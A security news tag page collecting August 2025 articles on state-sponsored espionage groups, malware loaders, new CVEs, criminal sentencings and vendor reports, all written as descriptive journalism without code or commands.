Tag: Cyber Security

Cybersecurity researchers are calling attention to malicious activity orchestrated by a China-nexus cyber espionage group known as Murky Panda that involves abusing trusted relationships in the cloud to breach enterprise networks.

“The adversary has also shown considerable ability to quickly weaponize N-day and zero-day vulnerabilities and frequently achieves initial access to their targets by exploiting internet-facing appliances,” CrowdStrike said in a Thursday report.

Murky Panda, also known as Silk Typhoon (formerly Hafnium), is best known for its zero-day exploitation of Microsoft Exchange Server flaws in 2021. Attacks mounted by the hacking group have targeted government, technology, academic, legal, and professional services entities in North America.

Earlier this March, Microsoft detailed the threat actor’s shift in tactics, detailing its targeting of the information technology (IT) supply chain as a means to obtain initial access to corporate networks. It’s assessed that Murky Panda’s operations are driven by intelligence gathering.

Like other Chinese hacking groups, Murky Panda has exploited internet-facing appliances to obtain initial access and is believed to have also compromised small office/home office (SOHO) devices that are geolocated in the targeted country as an exit node to hinder detection efforts.

Other infection pathways include exploitation of known security flaws in Citrix NetScaler ADC and NetScaler Gateway (CVE-2023-3519) and Commvault (CVE-2025-3928). The initial access is leveraged to deploy web shells like neo-reGeorg to establish persistence and ultimately drop a custom malware called CloudedHope.

A 64-bit ELF binary and written in Golang, CloudedHope functions as a basic remote access tool (RAT) while employing anti-analysis and operational security (OPSEC) measures, such as modifying timestamps and deleting indicators of their presence in victim environments to fly under the radar.

But a notable aspect of Murky Panda’s tradecraft concerns the abuse of trusted relationships between partner organizations and their cloud tenants, exploiting zero-day vulnerabilities to breach software-as-a-service (SaaS) providers’ cloud environments and conduct lateral movement to downstream victims.

In at least one instance observed in late 2024, the threat actor is said to have compromised a supplier of a North American entity and used the supplier’s administrative access to the victim entity’s Entra ID tenant to add a temporary backdoor Entra ID account.

“Using this account, the threat actor then backdoored several preexisting Entra ID service principles related to Active Directory management and emails,” CrowdStrike said. “The adversary’s goals appear targeted in nature based on their focus on accessing emails.”

“Although Genesis Panda targets a variety of systems, they show consistent interest in compromising cloud-hosted systems to leverage the cloud control plane for lateral movement, persistence, and enumeration,” CrowdStrike said.

The adversary has observed “consistently” querying the Instance Metadata Service (IMDS) associated with a cloud-hosted server to obtain credentials for the cloud control plane and enumerate network and general instance configurations. It’s also known to use credentials, likely obtained from compromised virtual machines (VMs), to burrow deeper into the target’s cloud account.

The findings illustrate how Chinese hacking groups are becoming increasingly adept at breaking and navigating cloud environments, while also prioritizing stealth and persistence to ensure sustained access and covert data harvesting.

Glacial Panda Strikes Telecom Sector

The telecommunications sector, per CrowdStrike, has witnessed a 130% increase in nation-state activity over the past year, primarily driven by the fact they are a treasure trove of intelligence. The latest threat actor to train its sights on the industry vertical is a Chinese threat actor dubbed Glacial Panda.

The geographic footprint of the hacking group spans Afghanistan, Hong Kong, India, Japan, Kenya, Malaysia, Mexico, Panama, the Philippines, Taiwan, Thailand, and the United States.

“Glacial Panda highly likely conducts targeted intrusions for intelligence collection purposes, accessing and exfiltrating call detail records and related communications telemetry from multiple telecommunications organizations,” the cybersecurity company said.

“The adversary primarily targets Linux systems typical in the telecommunications industry, including legacy operating system distributions that support older telecommunications technologies.”

Attack chains implemented by the threat actor make use of known security vulnerabilities or weak passwords aimed at internet-facing and unmanaged servers, with follow-on activities leveraging privilege escalation bugs like CVE-2016-5195 (aka Dirty COW) and CVE-2021-4034 (aka PwnKit).

Besides relying on living-off-the-land (LotL) techniques, Glacial Panda’s intrusions pave the way for the deployment of trojanized OpenSSH components, collectively codenamed ShieldSlide, to gather user authentication sessions and credentials.

“The ShieldSlide-trojanized SSH server binary also provides backdoor access, authenticating any account (including root) when a hardcoded password is entered,” CrowdStrike said.

Aug 22, 2025The Hacker NewsPenetration Testing / Security Operations

Pentesting remains one of the most effective ways to identify real-world security weaknesses before adversaries do. But as the threat landscape has evolved, the way we deliver pentest results hasn’t kept pace.

Most organizations still rely on traditional reporting methods—static PDFs, emailed documents, and spreadsheet-based tracking. The problem? These outdated workflows introduce delays, create inefficiencies, and undermine the value of the work.

Security teams need faster insights, tighter handoffs, and clearer paths to remediation. That’s where automated delivery comes in. Platforms like PlexTrac automate pentest finding delivery in real time through robust, rules-based workflows. (No waiting for the final report!)

The Static Delivery Problem in a Dynamic World

Delivering a pentest report solely as a static document might have made sense a decade ago, but today it’s a bottleneck. Findings are buried in long documents that don’t align with how teams operate day-to-day. After receiving the report, stakeholders must manually extract findings, create tickets in platforms like Jira or ServiceNow, and coordinate remediation tracking through disconnected workflows. By the time remediation begins, days or weeks may have passed since the issues were discovered.

Why Automation Matters Now

As organizations adopt Continuous Threat Exposure Management (CTEM) and expand the frequency of offensive testing, the volume of findings rapidly grows. Without automation, teams struggle to keep up. Automating delivery helps cut through the noise and deliver results in real time for faster handoffs and visibility across the entire vulnerability lifecycle.

Benefits of automating pentest delivery include:

• Real-time actionability: Act on findings immediately, not after the report is finalized
• Faster response: Accelerate remediation, retesting and validation
• Standardized operations: Ensure every finding follows a consistent process
• Less manual work: Free teams to focus on strategic initiatives
• Improved focus: Keep teams focused on what matters

Service providers gain a competitive advantage by automating delivery and integrating directly into client workflows, making themselves an indispensable partner to drive client value.

For enterprises, it’s a fast track to operational maturity and a measurable reduction in mean time to remediation (MTTR).

5 Key Components of Automated Pentest Delivery

1. Centralized data ingestion: Start by consolidating all findings—manual and automated—into a single source of truth. This includes outputs from scanners (like Tenable, Qualys, Wiz, Snyk) as well as manual pentest findings. Without centralization, vulnerability management becomes a patchwork of disconnected tools and manual processes.
2. Automated real-time delivery: As findings are identified, they should be automatically routed to the right people and workflows without waiting for the full report. Predefined rulesets should trigger triage, ticketing, and tracking to allow remediation to begin while testing is still in progress.
3. Automated routing & ticketing: Standardize routing by defining rules based on severity, asset ownership, and exploitability. Automation can assign findings, generate tickets in tools like Jira or ServiceNow, notify stakeholders through Slack or email, and close out informational issues to ensure findings are automatically routed to the right teams and systems.
4. Standardized remediation workflows: Every finding from your centralized data should follow the same lifecycle from triage to closure based on the criteria you’ve set, regardless of source. Whether it’s discovered from a scanner or manual testing, the process from triage to fix should be consistent and traceable.
5. Triggered retesting & validation: When a finding is marked as resolved, automation should trigger the appropriate retesting or validation workflow. This ensures nothing slips through the cracks and keeps communication between security and IT teams coordinated and closed-loop.

PlexTrac supports each of these capabilities through its Workflow Automation Engine, helping teams unify and accelerate delivery, remediation, and closure in one platform.

Avoid Common Pitfalls

Automation is about more than just speed. It’s about building standardized, scalable systems. However, if not implemented thoughtfully, it can create new problems. Watch out for:

• Overcomplicating early efforts: Trying to automate everything at once can stall momentum. Start small and focus on a few repeatable workflows first. Add complexity over time and expand as you validate success.
• Treating automation as a one-time setup: Your workflows should evolve alongside your tools, team structure, and priorities. Failing to iterate leads to stale processes that no longer align with how teams operate.
• Automating without clearly defined workflows: Jumping into automation without first mapping out your current workflows often leads to chaos. Without clear rules for routing, ownership, and escalation, automation may create more problems than it solves.

How to get started

Here’s how to begin automating pentest delivery:

1. Map your current workflow: Document how findings are delivered, triaged, assigned, and tracked today.
2. Identify friction points: Look for repetitive tasks, handoff delays, and areas where communication breaks down.
3. Start small: Automate one or two high-impact steps first, like ticket creation, email alerts, or finding delivery. Add complexity over time as you validate what’s working well and use early results to evolve workflows, add rules, and further streamline.
4. Choose the right platform: Look for solutions that integrate with your existing tools and provide visibility across the vulnerability lifecycle.
5. Measure impact: Track metrics like MTTR, handoff delays, and retest completion to show the value of your efforts.

The Future of Pentest Delivery

Security teams are shifting from reactive testing to proactive exposure management. Pentest delivery automation is a key part of that evolution to help teams move faster, collaborate better, and reduce risk more effectively.

For Service Providers, this is a chance to differentiate services, scale operations, and deliver more value with less overhead. For Enterprise teams, it means driving maturity, demonstrating progress, and staying ahead of emerging threats.

Conclusion

Pentesting is too important to be stuck in static reports and manual workflows. By automating delivery, routing, and remediation tracking, organizations can unlock the full value of their offensive security efforts by making findings more actionable, standardizing remediation workflows, and delivering measurable outcomes.

Whether you’re delivering tests to clients or to an internal team, the message is clear: The future of pentest delivery is automated.

Want to see what automated pentest workflows look like in action? Platforms like PlexTrac centralize security data from both manual testing and automated tools, enabling real-time delivery and standardized workflows across the entire vulnerability lifecycle.

Aug 22, 2025Ravie LakshmananCybercrime / Malware

A 55-year-old Chinese national has been sentenced to four years in prison and three years of supervised release for sabotaging his former employer’s network with custom malware and deploying a kill switch that locked out employees when his account was disabled.

Davis Lu, 55, of Houston, Texas, was convicted of causing intentional damage to protected computers in March 2025. He was arrested and charged in April 2021 for abusing his position as a software developer to execute malicious code on his employer’s computer servers.

“The defendant breached his employer’s trust by using his access and technical knowledge to sabotage company networks, wreaking havoc and causing hundreds of thousands of dollars in losses for a U.S. company,” said Acting Assistant Attorney General Matthew R. Galeotti of the Justice Department’s Criminal Division.

“However, the defendant’s technical savvy and subterfuge did not save him from the consequences of his actions.”

Court documents show that Lu was employed as a software developer for the unnamed company based in Ohio from November 2007 to October 2019. But after his responsibilities and system access were reduced following a 2018 corporate realignment, Lu enacted a scheme to deliberately introduce malicious code around August 2019, resulting in system crashes and preventing user logins.

To pull this off, Lu is said to have created infinite loops in source code to trigger server crashes by repeatedly creating new Java threads without proper termination. He also deleted coworker profile files and implemented a kill switch that would lock out all users if his credentials in the company’s Active Directory were disabled.

“The ‘kill switch’ code – which Lu named ‘IsDLEnabledinAD,’ abbreviating ‘Is Davis Lu enabled in Active Directory’ — was automatically activated when he was placed on leave and asked to surrender his laptop on September 9, 2019, and impacted thousands of company users globally,” the Department of Justice said.

“Lu named other code ‘Hakai,’ a Japanese word meaning ‘destruction,’ and ‘HunShui,’ a Chinese word meaning ‘sleep’ or ‘lethargy.’”

Furthermore, on the day Lu was instructed to return his company-issued laptop, the defendant deleted encrypted volumes and attempted to erase Linux directories and two additional projects. His internet search history laid bare the methods he researched to escalate privileges, hide processes, and delete files, suggesting an attempt to obstruct the company’s efforts to resolve the issues.

Lu’s unlawful actions are estimated to have cost the company hundreds of thousands of dollars in losses, per the department. This case also underscores the importance of identifying insider threats early, added Assistant Director Brett Leatherman of the Federal Bureau of Investigation’s (FBI) Cyber Division.

Aug 21, 2025Ravie LakshmananVulnerability / Software Security

Commvault has released updates to address four security gaps that could be exploited to achieve remote code execution on susceptible instances.

The list of vulnerabilities, identified in Commvault versions before 11.36.60, is as follows –

• CVE-2025-57788 (CVSS score: 6.9) – A vulnerability in a known login mechanism allows unauthenticated attackers to execute API calls without requiring user credentials
• CVE-2025-57789 (CVSS score: 5.3) – A vulnerability during the setup phase between installation and the first administrator login that allows remote attackers to exploit the default credentials to gain admin control
• CVE-2025-57790 (CVSS score: 8.7) – A path traversal vulnerability that allows remote attackers to perform unauthorized file system access through a path traversal issue, resulting in remote code execution
• CVE-2025-57791 (CVSS score: 6.9) – A vulnerability that allows remote attackers to inject or manipulate command-line arguments passed to internal components due to insufficient input validation, resulting in a valid user session for a low-privilege role

watchTowr Labs researchers Sonny Macdonald and Piotr Bazydlo have been credited with discovering and reporting the four security defects in April 2025. All the flagged vulnerabilities have been resolved in versions 11.32.102 and 11.36.60. Commvault SaaS solution is not affected.

In an analysis published Wednesday, the cybersecurity company said threat actors could fashion these vulnerabilities into two pre-authenticated exploit chains to achieve code execution on susceptible instances: One that combines CVE-2025-57791 and CVE-2025-57790, and the other that strings CVE-2025-57788, CVE-2025-57789, and CVE-2025-57790.

It’s worth noting that the second pre-auth remote code execution chain becomes successful only if the built-in admin password hasn’t been changed since installation.

The disclosure comes nearly four months after watchTowr Labs reported a critical Commvault Command Center flaw (CVE-2025-34028, CVSS score: 10.0) that could allow arbitrary code execution on affected installations.

A month later, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.

Aug 21, 2025Ravie LakshmananMalware / Cryptocurrency

Threat actors have been observed leveraging the deceptive social engineering tactic known as ClickFix to deploy a versatile backdoor codenamed CORNFLAKE.V3.

Google-owned Mandiant described the activity, which it tracks as UNC5518, as part of an access-as-a-service scheme that employs fake CAPTCHA pages as lures to trick users into providing initial access to their systems, which is then monetized by other threat groups.

“The initial infection vector, dubbed ClickFix, involves luring users on compromised websites to copy a malicious PowerShell script and execute it via the Windows Run dialog box,” Google said in a report published today.

The access provided by UNC5518 is assessed to be leveraged by at least two different hacking groups, UNC5774 and UNC4108, to initiate a multi-stage infection process and drop additional payloads –

• UNC5774, another financially motivated group that delivers CORNFLAKE as a way to deploy various subsequent payloads
• UNC4108, a threat actor with unknown motivation that uses PowerShell to deploy tools like VOLTMARKER and NetSupport RAT

The attack chain likely begins with the victim landing a fake CAPTCHA verification page after interacting with search results that employ search engine optimization (SEO) poisoning or malicious ads.

The user is then tricked into running a malicious PowerShell command by launching the Windows Run dialog, which then executes the next-stage dropper payload from a remote server. The newly downloaded script checks if it’s running within a virtualized environment and ultimately launches CORNFLAKE.V3.

Observed in both JavaScript and PHP versions, CORNFLAKE.V3 is a backdoor that supports the execution of payloads via HTTP, including executables, dynamic-link libraries (DLLs), JavaScript files, batch scripts, and PowerShell commands. It can also collect basic system information and transmit it to an external server. The traffic is proxied through Cloudflare tunnels in an attempt to avoid detection.

“CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, sharing a significant portion of its codebase,” Mandiant researcher Marco Galli said. “Unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.”

Both generations are markedly different from their progenitor, a C-based downloader that uses TCP sockets for command-and-control (C2) communications and only has the ability to run DLL payloads.

Persistence on the host is achieved by means of Windows Registry changes. At least three different payloads are delivered via CORNFLAKE.V3. This comprises an Active Directory reconnaissance utility, a script to harvest credentials via Kerberoasting, and another backdoor referred to as WINDYTWIST.SEA, a C version of WINDYTWIST that supports relaying TCP traffic, providing a reverse shell, executing commands, and removing itself.

Select versions of WINDYTWIST.SEA have also been observed attempting to move laterally in the network of the infected machine.

“To mitigate malware execution through ClickFix, organizations should disable the Windows Run dialog box where possible,” Galli said. “Regular simulation exercises are crucial to counter this and other social engineering tactics. Furthermore, robust logging and monitoring systems are essential for detecting the execution of subsequent payloads, such as those associated with CORNFLAKE.V3.”

USB Infection Drops XMRig Miner

The disclosure comes as the threat intelligence firm detailed an ongoing campaign that employs USB drives to infect other hosts and deploy cryptocurrency miners since September 2024.

“This demonstrates the continued effectiveness of initial access via infected USB drives,” Mandiant said. “The low cost and ability to bypass network security make this technique a compelling option for attackers.”

The attack chain starts when a victim is tricked into executing a Windows shortcut (LNK) in the compromised USB drive. The LNK file results in the execution of a Visual Basic script also located in the same folder. The script, for its part, launches a batch script to initiate the infection –

• DIRTYBULK, a C++ DLL launcher to initiate the execution of other malicious components, such as CUTFAIL
• CUTFAIL, a C++ malware dropper responsible for decrypting and installing malware onto a system, such as HIGHREPS and PUMPBENCH, as well as third-libraries like OpenSSL, libcurl, and WinPthreadGC
• HIGHREPS, a downloader that retrieves additional files to ensure persistence of PUMPBENCH
• PUMPBENCH, a C++ backdoor that facilitates reconnaissance, provides remote access by communicating with a PostgreSQL database server, and download XMRig
• XMRig, an an open-source software for mining cryptocurrencies such as Monero, Dero, and Ravencoin

“PUMPBENCH spreads by infecting USB drives,” Mandiant said. “It scans the system for available drives and then creates a batch file, a VBScript file, a shortcut file, and a DAT file.”

Aug 21, 2025Ravie LakshmananMalware / Email Security

Cybersecurity researchers have disclosed details of a new malware loader called QuirkyLoader that’s being used to deliver via email spam campaigns an array of next-stage payloads ranging from information stealers to remote access trojans since November 2024.

Some of the notable malware families distributed using QuirkyLoader include Agent Tesla, AsyncRAT, Formbook, Masslogger, Remcos RAT, Rhadamanthys Stealer, and Snake Keylogger.

IBM X-Force, which detailed the malware, said the attacks involve sending spam emails from both legitimate email service providers and a self-hosted email server. These emails feature a malicious archive, which contains a DLL, an encrypted payload, and a real executable.

“The actor uses DLL side-loading, a technique where launching the legitimate executable also loads the malicious DLL,” security researcher Raymond Joseph Alfonso said. “This DLL, in turn, loads, decrypts, and injects the final payload into its target process.”

This is achieved by using process hollowing to inject the malware into one of the three processes: AddInProcess32.exe, InstallUtil.exe, or aspnet_wp.exe.

The DLL loader, per IBM, has been used in limited campaigns for the past few months, with two campaigns observed in July 2025 targeting Taiwan and Mexico.

The campaign targeting Taiwan is said to have specifically singled out employees of Nusoft Taiwan, a network and internet security research company based in New Taipei City, with the goal of infecting them with Snake Keylogger, which is capable of stealing sensitive information from popular web browsers, keystrokes, and clipboard content.

The Mexico-related campaign, on the other hand, is assessed to be random, with the infection chains delivering Remcos RAT and AsyncRAT.

“The threat actor consistently writes the DLL loader module in .NET languages and uses ahead-of-time (AOT) compilation,” Alfonso said. “This process compiles the code into native machine code before execution, making the resulting binary appear as though it were written in C or C++.”

New Phishing Trends

The development comes as threat actors are using new QR code phishing (aka quishing) tactics like splitting malicious QR codes into two parts or embedding them within legitimate ones in email messages propagated via phishing kits like Gabagool and Tycoon, respectively, to evade detection, demonstrating ongoing evolution.

“Malicious QR codes are popular with attackers for several reasons,” Barracuda researcher Rohit Suresh Kanase said. “They cannot be read by humans so don’t raise any red flags, and they can often bypass traditional security measures such as email filters and link scanners.”

“Furthermore, since recipients often have to switch to a mobile device to scan the code, it can take users out of the company security perimeter and away from protection.”

The findings also follow the emergence of a phishing kit used by the PoisonSeed threat actor to acquire credentials and two-factor authentication (2FA) codes from individuals and organizations to gain access to victims’ accounts and use them to send emails for carrying out cryptocurrency scams.

“The domains hosting this phishing kit impersonate login services from prominent CRM and bulk email companies like Google, SendGrid, Mailchimp, and likely others, targeting individuals’ credentials,” NVISO Labs said. “PoisonSeed employs spear-phishing emails embedding malicious links, which redirect victims to their phishing kit.”

A noteworthy aspect of the kit is the use of a technique known as precision-validated phishing in which the attacker validates an email address in real-time in the background, while a fake Cloudflare Turnstile challenge is served to the user. Once the checks are passed, a login form impersonating the legitimate online platform appears, allowing the threat actors to capture submitted credentials and then relay them to the service.

As security professionals, it’s easy to get caught up in a race to counter the latest advanced adversary techniques. Yet the most impactful attacks often aren’t from cutting-edge exploits, but from cracked credentials and compromised accounts. Despite widespread awareness of this threat vector, Picus Security’s Blue Report 2025 shows that organizations continue to struggle with preventing password cracking attacks and detecting the malicious use of compromised accounts.

With the first half of 2025 behind us, compromised valid accounts remain the most underprevented attack vector, highlighting the urgent need for a proactive approach focused on the threats that are evading organizations’ defenses.

A Wake-Up Call: The Alarming Rise in Password Cracking Success

The Picus Blue Report is an annual research publication that analyzes how well organizations are preventing and detecting real-world cyber threats. Unlike traditional reports that focus solely on threat trends or survey data, the Blue Report is based on empirical findings from over 160 million attack simulations conducted within organizations’ networks around the world, using the Picus Security Validation Platform.

In the Blue Report 2025, Picus Labs found that password cracking attempts succeeded in 46% of tested environments, nearly doubling the success rate from last year. This sharp increase highlights a fundamental weakness in how organizations are managing – or mismanaging – their password policies. Weak passwords and outdated hashing algorithms continue to leave critical systems vulnerable to attackers using brute-force or rainbow table attacks to crack passwords and gain unauthorized access.

Why Organizations Are Failing to Prevent Password Cracking Attacks

So, why are organizations still failing to prevent password cracking attacks? The root cause lies in the continued use of weak passwords and outdated credential storage methods. Many organizations still rely on easily guessable passwords and weak hashing algorithms, often without using proper salting techniques or multi-factor authentication (MFA).

In fact, our survey results showed that 46% of environments had at least one password hash cracked and converted to cleartext, highlighting the inadequacy of many password policies, particularly for internal accounts, where controls are often more lax than they are for their external counterparts.

To combat this, organizations must enforce stronger password policies, implement multi-factor authentication (MFA) for all users, and regularly validate their credential defenses. Without these improvements, attackers will continue to compromise valid accounts, obtaining easy access to critical systems.

Credential-Based Attacks: A Silent but Devastating Threat

The threat of credential abuse is both pervasive and dangerous, yet as the Blue Report 2025 highlights, organizations are still underprepared for this form of attack. And once attackers obtain valid credentials, they can easily move laterally, escalate privileges, and compromise critical systems.

Infostealers and ransomware groups frequently rely on stolen credentials to spread across networks, burrowing deeper and deeper, often without triggering detection. This stealthy movement within the network allows attackers to maintain long dwell times, undetected, while they exfiltrate data at will.

Despite this ongoing and well-known issue, organizations continue to prioritize perimeter defenses, often leaving identity and credential protection overlooked and under-funded as a result. This year’s Blue Report clearly shows that valid account abuse is at the core of modern cyberattacks, reinforcing the urgent need for a stronger focus on identity security and credential validation.

Valid Accounts (T1078): The Most Exploited Path to Compromise

One of the key findings in the Blue Report 2025 is that Valid Accounts (MITRE ATT&CK T1078) remains the most exploited attack technique, with a truly concerning 98% success rate. This means that once attackers gain access to valid credentials, whether through password cracking or initial access brokers, they can swiftly move through an organization’s network, often bypassing traditional defenses.

The use of compromised credentials is particularly effective because it allows attackers to operate under the radar, making it harder for security teams to detect malicious activity. Once inside, they can access sensitive data, deploy malware, or create new attack paths, all while seamlessly blending in with legitimate user activity.

How to Strengthen Your Defenses Against Credential Abuse and Password Cracking

To protect against increasingly effective attacks, organizations should implement stronger password policies and enforce complexity requirements, while eliminating outdated hashing algorithms in favor of more secure alternatives. It is also essential to adopt multi-factor authentication (MFA) for all sensitive accounts, ensuring that even if credentials do become compromised, attackers can’t just use them to access the network without an additional verification step.

Regularly validating credential defenses through simulated attacks is crucial to identifying vulnerabilities and ensuring that your controls are performing as expected. Organizations also need to enhance their behavioral detection capabilities to catch anomalous activities tied to credential abuse and lateral movement.

Additionally, monitoring and inspecting outbound traffic for signs of data exfiltration and ensuring that data loss prevention (DLP) measures are both in place and operating effectively are critical to protecting your sensitive information.

Closing the Gaps in Credential and Password Management

The findings in the Blue Report 2025 show that, unfortunately, many organizations are still vulnerable to the silent threat of password cracking and compromised accounts. And while strengthening perimeter defenses continues to be a priority, it’s also clear that core weaknesses lie in credential management and internal controls. The report also highlighted the fact that infostealers and ransomware groups are leveraging these gaps effectively.

If you’re ready to take proactive steps to harden your security posture, reduce your exposure, and prioritize your critical vulnerabilities, the Blue Report 2025 offers invaluable insights to show you where to focus. And at Picus Security, we’re always happy to talk about helping your organization meet its specific security needs..

Don’t forget to get your copy of The Blue Report 2025 and take proactive steps today to improve your security posture.

Aug 21, 2025Ravie LakshmananData Breach / Cybercrime

A 20-year-old member of the notorious cybercrime gang known as Scattered Spider has been sentenced to ten years in prison in the U.S. in connection with a series of major hacks and cryptocurrency thefts.

Noah Michael Urban pleaded guilty to charges related to wire fraud and aggravated identity theft back in April 2025. News of Urban’s sentencing was reported by Bloomberg and Jacksonville news outlet News4JAX.

In addition, 120 months in federal prison, Urban faces an additional three years of supervised release and has been ordered to pay $13 million in restitution to victims. In a statement shared with security journalist Brian Krebs, Urban called the sentence unjust.

Urban, who also went by the aliases Sosa, Elijah, King Bob, Gustavo Fring, and Anthony Ramirez, was arrested by U.S. authorities in Florida in January 2024 for committing wire fraud and aggravated identity theft between August 2022 and March 2023. These incidents led to the theft of at least $800,000 from at least five different victims, per the U.S. Department of Justice (DoJ).

Prosecutors said Urban and his co-conspirators engaged in SIM swapping attacks to hijack victims’ cryptocurrency accounts and plunder the digital assets.

Later that November, the DoJ unsealed criminal charges against Urban and four other members of Scattered Spider for using social engineering techniques to target employees of companies across the U.S. and to break into corporate networks and steal proprietary data and to siphon millions of dollars in cryptocurrency.

Tyler Robert Buchanan, who is among those indicted, was extradited from Spain to the U.S. in April following his arrest in the European nation last June.

The development comes as Scattered Spider has joined forces with other threat groups ShinyHunters and LAPSUS$ to form a new cybercrime alliance. The group, associated with a broader English-speaking cybercriminal collective called The Com, has a history of conducting social engineering, credential theft, and SIM swapping, initial access, ransomware deployment, data theft, and extortion attacks.

“Scattered Spider has historically leaned on tactics that generate urgency, drive media and industry attention, create fear of exposure, and help force victims to payout quicker,” Adam Darrah, vice president of intelligence at ZeroFox, told The Hacker News in a statement.

“Timed leaks, countdown threats, and taunts directed at security firms are all part of their playbook. They have ties to a wider network of like-minded actors, which has given them access to more tools, data, and infrastructure, multiplying their effectiveness. We regularly see groups team up when there is an increase in external pressures, like law enforcement crackdowns. To survive, these groups need to consolidate. And the result is often a more versatile and potentially dangerous combined operation.”

Cybersecurity firm Flashpoint, which published a profile of Scattered Spider last week, said the financially-motivated hacking group adopts a wave-like approach by choosing a specific sector and attacking as many organizations within that vertical over a short span of time.

“The tactics employed by Scattered Spider demonstrate their ability to exploit weaknesses in security programs by targeting people rather than strictly systems or technical vulnerabilities,” it said. “Their use of social engineering, via vishing, smishing, and MFA fatigue attacks, proves that even the most advanced technical defenses can be circumvented through human deception.”

Aug 21, 2025Ravie LakshmananVulnerability / Zero-Day

Apple has released security updates to address a security flaw impacting iOS, iPadOS, and macOS that it said has come under active exploitation in the wild.

The zero-day out-of-bounds write vulnerability, tracked as CVE-2025-43300, resides in the ImageIO framework that could result in memory corruption when processing a malicious image.

“Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals,” the company said in an advisory.

The iPhone maker said the bug was internally discovered and that it was addressed with improved bounds checking. The following versions address the security defect –

• iOS 18.6.2 and iPadOS 18.6.2 – iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later
• iPadOS 17.7.10 – iPad Pro 12.9-inch 2nd generation, iPad Pro 10.5-inch, and iPad 6th generation
• macOS Ventura 13.7.8 – Macs running macOS Ventura
• macOS Sonoma 14.7.8 – Macs running macOS Sonoma
• macOS Sequoia 15.6.1 – Macs running macOS Sequoia

It’s currently not known who is behind the attacks and who may have been targeted, but it’s likely that the vulnerability has been weaponised as part of highly targeted attacks.

With the latest update, Apple has so far fixed a total of seven zero-days that have been abused in real-world attacks since the start of the year: CVE-2025-24085, CVE-2025-24200, CVE-2025-24201, CVE-2025-31200, CVE-2025-31201, and CVE-2025-43200.

Last month, the company also issued patches for a Safari vulnerability residing in an open-source component (CVE-2025-6558) that Google reported as having been exploited as a zero-day in the Chrome web browser.

Aug 20, 2025Ravie LakshmananCyber Espionage / Vulnerability

A Russian state-sponsored cyber espionage group known as Static Tundra has been observed actively exploiting a seven-year-old security flaw in Cisco IOS and Cisco IOS XE software as a means to establish persistent access to target networks.

Cisco Talos, which disclosed details of the activity, said the attacks single out organizations in telecommunications, higher education and manufacturing sectors across North America, Asia, Africa and Europe. Prospective victims are chosen based on their “strategic interest” to Russia, it added, with recent efforts directed against Ukraine and its allies following the onset of the Russo-Ukrainian war in 2022.

The vulnerability in question is CVE-2018-0171 (CVSS score: 9.8), a critical flaw in the Smart Install feature of Cisco IOS Software and Cisco IOS XE software that could allow an unauthenticated, remote attacker to trigger a denial-of-service (DoS) condition or execute arbitrary code.

It’s worth noting that the security defect has also been likely weaponized by the China-aligned Salt Typhoon (aka Operator Panda) actors as part of attacks targeting U.S. telecommunication providers in late 2024.

Static Tundra, per Talos, is assessed to be linked to the Federal Security Service’s (FSB) Center 16 unit and operational for over a decade, with a focus on long-term intelligence gathering operations. It’s believed to be a sub-cluster of another group that’s tracked as Berserk Bear, Crouching Yeti, Dragonfly, Energetic Bear, and Havex.

The U.S. Federal Bureau of Investigation (FBI), in a concurrent advisory, said it has observed FSB cyber actors “exploiting Simple Network Management Protocol (SNMP) and end-of-life networking devices running an unpatched vulnerability (CVE-2018-0171) in Cisco Smart Install (SMI) to broadly target entities in the United States and globally.”

In these attacks, the threat actors have been found collecting configuration files for thousands of networking devices associated with U.S. entities across critical infrastructure sectors. The activity is also characterized by the attackers modifying configuration files on susceptible devices to facilitate unauthorized access.

The foothold is then abused to conduct reconnaissance within the victim networks, while simultaneously deploying custom tools like SYNful Knock, a router implant first reported by Mandiant in September 2015.

“SYNful Knock is a stealthy modification of the router’s firmware image that can be used to maintain persistence within a victim’s network,” the threat intelligence firm said at the time. “It is customizable and modular in nature and thus can be updated once implanted.”

Another noteworthy aspect of the attacks concerns the use of SNMP to send instructions to download a text file from a remote server and append it to the current running configuration so as to allow for additional means of access to the network devices. Defense evasion is achieved by modifying TACACS+ configuration on infected appliances to interfere with remote logging functions.

“Static Tundra likely uses publicly-available scan data from services such as Shodan or Censys to identify systems of interest,” Talos researchers Sara McBroom and Brandon White said. “One of Static Tundra’s primary actions on objectives is to capture network traffic that would be of value from an intelligence perspective.”

This is accomplished by setting up Generic Routing Encapsulation (GRE) tunnels that redirect traffic of interest to attacker-controlled infrastructure. The adversary has also been spotted collecting and exfiltrating NetFlow data on compromised systems. The harvested data is exfiltrated via outbound TFTP or FTP connections.

Static Tundra’s activities are primarily focused on unpatched, and often end-of-life, network devices with the goal of establishing access on primary targets and facilitating secondary operations against related targets of interest. Upon gaining initial access, the threat actors burrow deeper into the environment and hack into additional network devices for long-term access and information gathering.

To mitigate the risk posed by the threat, Cisco is advising customers to apply the patch for CVE-2018-0171 or disable Smart Install if patching is not an option.

“The purpose of this campaign is to compromise and extract device configuration information en masse, which can later be leveraged as needed based on then-current strategic goals and interests of the Russian government,” Talos said. “This is demonstrated by Static Tundra’s adaptation and shifts in operational focus as Russia’s priorities have changed over time.”